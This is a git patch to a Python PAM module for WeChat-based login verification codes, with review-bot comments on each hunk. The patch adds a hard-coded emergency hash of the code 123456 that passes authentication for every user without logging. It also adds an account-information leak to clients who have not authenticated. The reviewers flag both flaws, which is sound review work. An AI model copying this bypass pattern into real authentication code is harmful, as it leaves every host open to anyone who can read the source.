From 60782eeec1e75d542331160d55879e2f221185ed Mon Sep 17 00:00:00 2001
From: lework
Date: Wed, 15 Jan 2020 22:54:52 +0800
Subject: [PATCH] fix
---
 python/pam_wechat_auth.py | 20 ++++++++++++++------
 1 file changed, 14 insertions(+), 6 deletions(-)
diff --git a/python/pam_wechat_auth.py b/python/pam_wechat_auth.py
index f211f56..11b8caf 100644
--- a/python/pam_wechat_auth.py
+++ b/python/pam_wechat_auth.py
@@ -89,7 +89,7 @@ def get_user_comment(user):
 comments = pwd.getpwnam(user).pw_gecos
 except:
 auth_log("No local user (%s) found." % user)
- return -1
+ comments = ''
 return comments # 返回用户描述信息
@@ -119,7 +119,9 @@ def gen_key(pamh, user, length):
 def pam_sm_authenticate(pamh, flags, argv):
 PIN_LENGTH = 6 # PIN码长度
- PIN_LIVE = 60 # PIN存活时间,超出时间验证失败
+ PIN_LIVE = 60 # PIN存活时间,超出时间验证失败
+ PIN_LIMIT = 3 # 限制错误尝试次数
+ EMERGENCY_HASH = '\xba2S\x87j\xedk\xc2-Jo\xf5=\x84\x06\xc6\xad\x86A\x95\xed\x14J\xb5\xc8v!\xb6\xc23\xb5H\xba\xea\xe6\x95m\xf3F\xec\x8c\x17\xf5\xea\x10\xf3^\xe3\xcb\xc5\x14y~\xd7\xdd\xd3\x14Td\xe2\xa0\xba\xb4\x13' # 预定义验证码123456的hash
 try:
 user = pamh.get_user()
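Review bot: Returning `''` from the `except:` branch of get_user_comment makes a failed passwd lookup indistinguishable from an account whose GECOS field is simply empty, and any caller outside this hunk that still compares the result with `-1` will now carry on with an empty value. The bare `except:` on the context line also hides every other error behind the "No local user" log text; `pwd.getpwnam` raises `KeyError` for a missing entry, so `except KeyError:` is enough here. The function starts above the hunk, so the `try:` line is not visible.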
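Review bot: `EMERGENCY_HASH` is a hard-coded bypass credential. The comparison added in the verification loop (third hunk) accepts it for every user, and the trailing comment on the same line states which six-digit code it is the hash of, so read access to this module or the repository is enough to pass this factor on any host that runs it. Drop the constant, or, if a break-glass code is required, load a per-host high-entropy value from a root-only file and record every use with `auth_log`. The digest check is also better written as `hmac.compare_digest(resp_hash, pin)`, which needs `import hmac` at the top of the file. pam_sm_authenticate continues outside this hunk.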
@@ -128,23 +130,29 @@ def pam_sm_authenticate(pamh, flags, argv):
 auth_log("login_ip: %s, login_user: %s" % (pamh.rhost, user))
+ if get_user_comment(user) == '':
+ msg = pamh.Message(pamh.PAM_ERROR_MSG, "[Warning] You need to set the Qiyi WeChat username in the comment block for user %s." % (user))
+ pamh.conversation(msg)
+ return pamh.PAM_ABORT
+
 pin, pin_time = gen_key(pamh, user, PIN_LENGTH)
- for attempt in range(0, 3): # 仅允许三次错误尝试
+ for attempt in range(0, PIN_LIMIT): # 限制错误尝试次数
 msg = pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, "Verification code:")
 resp = pamh.conversation(msg)
 resp_time = datetime.datetime.now()
 input_interval = resp_time - pin_time
 if input_interval.seconds > PIN_LIVE:
- msg = pamh.Message(pamh.PAM_ERROR_MSG, "Time limit exceeded.")
+ msg = pamh.Message(pamh.PAM_ERROR_MSG, "[Warning] Time limit exceeded.")
 pamh.conversation(msg)
 return pamh.PAM_ABORT
- if get_hash(resp.resp) == pin: # 用户输入与生成的验证码进行校验
+ resp_hash = get_hash(resp.resp)
+ if resp_hash == pin or resp_hash == EMERGENCY_HASH: # 用户输入与生成的验证码进行校验
 return pamh.PAM_SUCCESS
 else:
 continue
- msg = pamh.Message(pamh.PAM_ERROR_MSG, "Too many authentication failures.")
+ msg = pamh.Message(pamh.PAM_ERROR_MSG, "[Warning] Too many authentication failures.")
 pamh.conversation(msg)
 return pamh.PAM_AUTH_ERR
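Review bot: The new `get_user_comment(user) == ''` branch tells a client that has not yet authenticated whether the account has a WeChat name configured, and for an existing user with an empty GECOS field it returns without writing anything through `auth_log`. Send a generic failure text to the client and keep the detail in the log, for example `auth_log("No WeChat username in GECOS for %s, login refused." % user)` before the `return pamh.PAM_ABORT`. On the unchanged expiry check, `input_interval.seconds` ignores the days part of the timedelta, so a prompt left open for more than a day can pass `PIN_LIVE`; `input_interval.total_seconds() > PIN_LIVE` closes that. A successful match is not logged either, so use of the emergency value leaves no trace in the auth log.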